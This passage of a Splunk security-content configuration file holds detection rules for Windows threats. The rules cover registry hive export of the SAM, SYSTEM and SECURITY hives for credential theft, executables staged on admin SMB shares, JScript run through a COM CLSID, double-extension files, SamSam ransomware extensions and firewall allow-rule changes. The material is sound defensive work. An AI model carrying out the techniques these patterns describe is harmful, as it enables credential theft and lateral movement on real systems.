objects (for example, mailboxes, mail users, mail contacts, and distribution groups). action.notable.param.rule_title = Exchange PowerShell Module Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*New-MailboxExportRequest*", "*New-ManagementRoleAssignment*", "*New-MailboxSearch*", "*Get-Recipient*", "Search-Mailbox") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest |rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_module_usage_filter` [ESCU - Executable File Written in Administrative SMB Share - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as its commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as its commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 5145 EventCode enabled. The Windows TA is also required. Also enable the object Audit access success/failure in your group policy. action.escu.known_false_positives = System Administrators may use looks like PsExec for troubleshooting or administrations tasks. However, this will typically come only from certain users and certain systems that can be added to an allow list. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Executable File Written in Administrative SMB Share - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Prestige Ransomware", "Graceful Wipe Out Attack", "Industroyer2", "IcedID", "Data Destruction", "Hermetic Wiper", "Trickbot"] action.risk = 1 action.risk.param._risk_message = $src_user$ dropped or created an executable file in known sensitive SMB share. Share name=$ShareName$, Target name=$RelativeTargetName$, and Access mask=$AccessMask$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Executable File Written in Administrative SMB Share - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Prestige Ransomware", "Graceful Wipe Out Attack", "Industroyer2", "IcedID", "Data Destruction", "Hermetic Wiper", "Trickbot"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as its commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network. action.notable.param.rule_title = Executable File Written in Administrative SMB Share action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5145 RelativeTargetName IN ("*.exe","*.dll") ObjectType=File ShareName IN ("\\\\*\\C$","\\\\*\\IPC$","\\\\*\\admin$") AccessMask= "0x2" | stats min(_time) as firstTime max(_time) as lastTime count by EventCode ShareName RelativeTargetName ObjectType AccessMask src_user src_port IpAddress | `security_content_ctime(firstTime)` | `executable_file_written_in_administrative_smb_share_filter` [ESCU - Executables Or Script Creation In Suspicious Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies potentially malicious executables or scripts by examining a list of suspicious file paths on Windows Operating System. The purpose of this technique is to uncover files with known file extensions that could be used by adversaries to evade detection and persistence. The suspicious file paths selected for investigation are typically uncommon and uncommonly associated with executable or script files. By scrutinizing these paths, we can proactively identify potential security threats and enhance overall system security. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies potentially malicious executables or scripts by examining a list of suspicious file paths on Windows Operating System. The purpose of this technique is to uncover files with known file extensions that could be used by adversaries to evade detection and persistence. The suspicious file paths selected for investigation are typically uncommon and uncommonly associated with executable or script files. By scrutinizing these paths, we can proactively identify potential security threats and enhance overall system security. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the Filesystem responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = Administrators may allow creation of script or exe in the paths specified. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Executables Or Script Creation In Suspicious Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = Suspicious executable or scripts with file name $file_name$, $file_path$ and process_id $process_id$ executed in suspicious file path in Windows by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Executables Or Script Creation In Suspicious Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` values(Filesystem.file_path) as file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name = *.exe OR Filesystem.file_name = *.dll OR Filesystem.file_name = *.sys OR Filesystem.file_name = *.com OR Filesystem.file_name = *.vbs OR Filesystem.file_name = *.vbe OR Filesystem.file_name = *.js OR Filesystem.file_name = *.ps1 OR Filesystem.file_name = *.bat OR Filesystem.file_name = *.cmd OR Filesystem.file_name = *.pif) AND ( Filesystem.file_path = *\\windows\\fonts\\* OR Filesystem.file_path = *\\windows\\temp\\* OR Filesystem.file_path = *\\users\\public\\* OR Filesystem.file_path = *\\windows\\debug\\* OR Filesystem.file_path = *\\Users\\Administrator\\Music\\* OR Filesystem.file_path = *\\Windows\\servicing\\* OR Filesystem.file_path = *\\Users\\Default\\* OR Filesystem.file_path = *Recycle.bin* OR Filesystem.file_path = *\\Windows\\Media\\* OR Filesystem.file_path = *\\Windows\\repair\\* OR Filesystem.file_path = *\\AppData\\Local\\Temp* OR Filesystem.file_path = *\\PerfLogs\\*) by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `executables_or_script_creation_in_suspicious_path_filter` [ESCU - Execute Javascript With Jscript COM CLSID - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify suspicious process of cscript.exe where it tries to execute javascript using jscript.encode CLSID (COM OBJ). This technique was seen in ransomware (reddot ransomware) where it execute javascript with this com object with combination of amsi disabling technique. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify suspicious process of cscript.exe where it tries to execute javascript using jscript.encode CLSID (COM OBJ). This technique was seen in ransomware (reddot ransomware) where it execute javascript with this com object with combination of amsi disabling technique. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-06-22 action.escu.modification_date = 2021-06-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Execute Javascript With Jscript COM CLSID - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = Suspicious process of cscript.exe with a parent process $parent_process_name$ where it tries to execute javascript using jscript.encode CLSID (COM OBJ), detected on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Execute Javascript With Jscript COM CLSID - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will identify suspicious process of cscript.exe where it tries to execute javascript using jscript.encode CLSID (COM OBJ). This technique was seen in ransomware (reddot ransomware) where it execute javascript with this com object with combination of amsi disabling technique. action.notable.param.rule_title = Execute Javascript With Jscript COM CLSID action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cscript.exe" Processes.process="*-e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}*" by Processes.parent_process_name Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `execute_javascript_with_jscript_com_clsid_filter` [ESCU - Execution of File with Multiple Extensions - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2020-11-18 action.escu.modification_date = 2020-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Execution of File with Multiple Extensions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities", "AsyncRAT", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = process $process$ have double extensions in the file name is executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Execution of File with Multiple Extensions - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities", "AsyncRAT", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.notable.param.rule_title = Execution of File with Multiple Extensions action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.doc.exe", "*.xls.exe","*.ppt.exe", "*.htm.exe", "*.html.exe", "*.txt.exe", "*.pdf.exe", "*.docx.exe", "*.xlsx.exe", "*.pptx.exe","*.one.exe", "*.bat.exe", "*rtf.exe") by Processes.dest Processes.user Processes.process Processes.process_name Processes.parent_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_multiple_extensions_filter` [ESCU - Extraction of Registry Hives - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible some agent based products will generate false positives. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Extraction of Registry Hives - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = Suspicious use of `reg.exe` exporting Windows Registry hives containing credentials executed on $dest$ by user $user$, with a parent process of $parent_process_id$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Extraction of Registry Hives - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. action.notable.param.rule_title = Extraction of Registry Hives action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` (Processes.process=*save* OR Processes.process=*export*) AND (Processes.process="*\sam *" OR Processes.process="*\system *" OR Processes.process="*\security *") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `extraction_of_registry_hives_filter` [ESCU - File with Samsam Extension - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. action.escu.how_to_implement = You must be ingesting data that records file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = Because these extensions are not typically used in normal operations, you should investigate all results. action.escu.creation_date = 2018-12-14 action.escu.modification_date = 2018-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - File with Samsam Extension - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware"] action.risk = 1 action.risk.param._risk_message = File writes $file_name$ with extensions consistent with a SamSam ransomware attack seen on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - File with Samsam Extension - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. action.notable.param.rule_title = File with Samsam Extension action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)`| rex field=file_name "(?\.[^\.]+)$" | search file_extension=.stubbin OR file_extension=.berkshire OR file_extension=.satoshi OR file_extension=.sophos OR file_extension=.keyxml | `file_with_samsam_extension_filter` [ESCU - Firewall Allowed Program Enable - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potential suspicious modification of firewall rule allowing to execute specific application. This technique was identified when an adversary and red teams to bypassed firewall file execution restriction in a targetted host. Take note that this event or command can run by administrator during testing or allowing legitimate tool or application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a potential suspicious modification of firewall rule allowing to execute specific application. This technique was identified when an adversary and red teams to bypassed firewall file execution restriction in a targetted host. Take note that this event or command can run by administrator during testing or allowing legitimate tool or application. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated or manual execution of this firewall rule that may generate false positives. Filter as needed. action.escu.creation_date = 2021-11-12 action.escu.modification_date = 2021-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Firewall Allowed Program Enable - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Azorult", "BlackByte Ransomware", "NjRAT", "PlugX"] action.risk = 1 action.risk.param._risk_message = firewall allowed program commandline $process$ of $process_name$ on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Firewall Allowed Program Enable - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Azorult", "BlackByte Ransomware", "NjRAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*firewall*" Processes.process = "*allow*" Processes.process = "*add*" Processes.process = "*ENABLE*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `firewall_allowed_program_enable_filter` [ESCU - First Time Seen Child Process of Zoom - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for child processes spawned by zoom.exe or zoom.us that has not previously been seen. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for child processes spawned by zoom.exe or zoom.us that has not previously been seen. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A new child process of zoom isn't malicious by that fact alone. Further investigation of the actions of the child process is needed to verify any malicious behavior is taken. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - First Time Seen Child Process of Zoom - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Zoom Child Processes"] action.risk = 1 action.risk.param._risk_message = Child process $process_name$ with $process_id$ spawned by zoom.exe or 